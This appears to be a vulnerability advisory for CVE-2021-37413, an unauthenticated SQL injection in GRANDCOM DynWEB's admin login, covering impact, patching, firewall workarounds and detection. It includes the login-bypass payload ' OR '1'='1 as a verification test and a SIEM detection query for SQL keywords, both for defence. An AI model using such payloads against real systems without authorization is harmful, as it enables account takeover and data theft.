CVE-2021-37413
📋 TL;DR
CVE-2021-37413 is a critical SQL injection vulnerability in GRANDCOM DynWEB's admin login interface that allows unauthenticated attackers to execute arbitrary SQL commands. This enables complete administrative takeover, database access, and file upload capabilities. All organizations running affected versions of DynWEB are vulnerable.
💻 Affected Systems
- GRANDCOM DynWEB
📦 What is this software?
Dynweb by Grandcom
⚠️ Risk & Real-World Impact
Worst Case
Complete compromise of the web application including administrative access, exfiltration of all user data, defacement of web content, and potential server takeover through file uploads leading to ransomware or data breach.
Likely Case
Administrative account takeover leading to website defacement, data theft from user databases, and potential lateral movement within the network.
If Mitigated
Limited impact with proper network segmentation, web application firewalls, and intrusion detection systems that block SQL injection attempts.
🎯 Exploit Status
SQL injection in login forms is a well-understood attack vector with many automated tools available. The unauthenticated nature makes this particularly dangerous.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: DynWEB 4.2 and later
Vendor Advisory: https://www.grandcom.sk
Restart Required: Yes
Instructions:
1. Download DynWEB version 4.2 or later from the vendor website. 2. Backup current installation and database. 3. Install the updated version following vendor instructions. 4. Restart the web application service. 5. Verify the admin login interface is functioning correctly.
🔧 Temporary Workarounds
Web Application Firewall (WAF)
allDeploy a WAF with SQL injection protection rules to block exploitation attempts.
Network Access Control
linuxRestrict access to the admin login interface using firewall rules or network segmentation.
iptables -A INPUT -p tcp --dport 80 -s trusted_ip -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -s trusted_ip -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 443 -j DROP
🧯 If You Can't Patch
- Implement strong input validation and parameterized queries in the login script
- Disable or rename the admin login interface if not required
🔍 How to Verify
Check if Vulnerable:
Test the admin login interface with SQL injection payloads like ' OR '1'='1 in username/password fields. If login succeeds without valid credentials, the system is vulnerable.Check Version:
Check the DynWEB administration panel or configuration files for version information. Typically found in /admin/ or web interface footer.Verify Fix Applied:
Attempt the same SQL injection tests after patching. Successful login should only occur with valid credentials.📡 Detection & Monitoring
Log Indicators:
- Multiple failed login attempts with SQL keywords (SELECT, UNION, OR, --)
- Successful admin logins from unusual IP addresses
- Unusual database query patterns in application logs
Network Indicators:
- HTTP POST requests to admin login endpoint containing SQL syntax
- Unusual outbound database connections from web server
SIEM Query:
source="web_logs" AND (uri_path="/admin/login" OR uri_path="/admin/authenticate") AND (request_body LIKE "%SELECT%" OR request_body LIKE "%UNION%" OR request_body LIKE "%OR%'1'='1%" OR request_body LIKE "%--%")